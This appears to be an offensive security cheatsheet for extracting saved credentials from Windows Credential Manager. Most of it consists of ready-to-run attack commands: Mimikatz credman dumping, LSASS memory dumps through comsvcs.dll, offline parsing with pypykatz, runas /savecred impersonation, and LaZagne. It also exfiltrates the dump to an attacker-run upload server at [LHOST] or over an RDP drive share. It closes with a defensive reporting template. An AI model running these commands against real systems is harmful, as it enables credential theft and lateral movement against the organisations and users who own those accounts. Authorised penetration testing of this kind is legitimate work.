π‘οΈ Methodology Checklist
- List stored credentials:
cmdkey /list - Use saved credential with runas:
runas /savecred /user:[DOMAIN]\[USER] cmd.exe - Extract with Mimikatz:
sekurlsa::credman - Extract with LaZagne:
lazagne.exe credman - Check for saved RDP, VPN, or web credentials
- Look for service account credentials stored for scheduled tasks
- Document all extracted credentials for report
π― Operational Context
Use when: Windows foothold with user-level access β extract saved credentials from Windows Credential Manager (web credentials, network passwords, certificate-based).
Think Dumber First: cmdkey /list β shows whatβs stored. Then nxc smb [TARGET] -u [USER] -p [PASS] --wcc for remote enumeration. Mimikatz vault::cred or vault::list for local extraction.
Skip when: Credential Manager is empty (cmdkey /list returns nothing) β common on servers; more useful on workstations.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
cmdkey /list | List all stored credentials in Credential Manager |
rundll32 keymgr.dll,KRShowKeyMgr | Open Credential Manager GUI (requires RDP) |
runas /savecred /user:[DOMAIN]\[USER] cmd | Spawn shell as stored user (no plaintext needed) |
mimikatz.exe β privilege::debug β sekurlsa::credman | Dump Credential Manager from live LSASS memory |
tasklist /svc | Find lsass.exe PID for MiniDump |
rundll32 C:\windows\system32\comsvcs.dll, MiniDump [PID] C:\lsass.dmp full | Dump LSASS to file |
pypykatz lsa minidump lsass.dmp > creds.txt | Parse dump offline |
grep -i -C 5 "credman" creds.txt | Filter pypykatz output for Credential Manager entries |
python3 -m uploadserver 8000 | Start HTTP upload server (attacker) to receive dump |
Invoke-RestMethod -Uri http://[LHOST]:8000/upload -Method Post -InFile C:\lsass.dmp | Upload dump via PowerShell |
π¬ Deep Dive & Workflow
What Credential Manager Stores
Windows Credential Manager holds credentials for:
- Domain Password β saved AD logon credentials for remote systems
- Generic β browser-saved credentials, mapped drives, application passwords
- Certificate-based β smart card / certificate credentials
Storage paths (encrypted with DPAPI):
%UserProfile%\AppData\Local\Microsoft\Vault\
%UserProfile%\AppData\Local\Microsoft\Credentials\
%UserProfile%\AppData\Roaming\Microsoft\Vault\
%ProgramData%\Microsoft\Vault\
Exploitation Path 1 β RunAs Impersonation (No Creds Needed)
If cmdkey /list shows a Domain Password entry for a target user, that credential can be used directly to spawn a shell β no plaintext password required:
runas /savecred /user:DOMAIN\Username cmd.exeHigh-value target: IT admins often store RDP credentials for servers they manage.
Exploitation Path 2 β Live Dump via Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::credman
Look for credman sections with Username, Domain, and Password fields in the output. Requires local admin.
Exploitation Path 3 β Offline via LSASS Dump + Pypykatz
Preferable when AV is active β processing happens off-target:
# Exfil option A: RDP drive share
xfreerdp /v:[TARGET_IP] /u:[USER] /p:[PASS] /drive:share,$(pwd)
# On target: copy C:\lsass.dmp \\tsclient\share\
# Exfil option B: HTTP upload
python3 -m uploadserver 8000
# On target: Invoke-RestMethod -Uri http://[LHOST]:8000/upload -Method Post -InFile C:\lsass.dmp
# Parse
pypykatz lsa minidump lsass.dmp > creds.txt
grep -i -C 5 "credman" creds.txtπ οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| cmdkey shows credentials but canβt extract | Requires session of that user | Use runas or token impersonation to get user context first |
| Mimikatz vault::cred returns nothing | Protected by DPAPI with different user key | Must run as the target user; DPAPI is user-specific |
| Generic credentials not displaying | Type filter needed | Enumerate all types: mimikatz # vault::list /patch |
| vaultcmd.exe not found | Older Windows | Use direct registry: reg query HKCU\Software\Microsoft\Protected Storage System Provider |
| Web credentials encrypted | Browser-specific DPAPI | Use LaZagne: lazagne.exe browsers extracts browser-stored creds separately from Windows Vault |
π Reporting Trigger
Finding Title: Windows Credential Manager Yields Plaintext Service Credentials Impact: Credentials saved in Windows Credential Manager for RDP connections, mapped network drives, and web applications are extractable in plaintext from user context, providing access to additional systems without brute force. Root Cause: Users save credentials in Windows Credential Manager for convenience without understanding that they are extractable by the userβs own session or any code running in that session context. Recommendation: Disable Windows Credential Manager for sensitive credentials via GPO. Enforce use of enterprise password manager for credential storage. Implement Privileged Access Workstations that prevent credential caching. Train users on risks of saved credentials.